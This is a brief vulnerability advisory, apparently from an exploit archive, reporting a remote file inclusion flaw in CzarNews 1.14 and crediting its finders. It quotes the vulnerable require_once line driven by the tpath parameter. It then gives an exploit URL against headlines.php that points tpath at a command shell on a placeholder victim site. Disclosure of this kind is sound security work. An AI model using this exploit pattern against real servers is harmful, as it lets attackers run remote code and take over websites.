CzarNews version 1.14 suffers from a remote file inclusion flaw.
fa25248be42aaa948df6ca0b885f65fe4b28ff15aa19a7b3d1268a519568f0ad
# SaVSaK.CoM | SpC-x - The-BeKiR |
# CzarNews v1.14 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : CzarNews
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# if(file_exists($tpath . "cn_config.php"))
# require_once($tpath . "cn_config.php");
# Vulnerable :
# http://www.victim.com/CzarNews/headlines.php?tpath=Command-Shell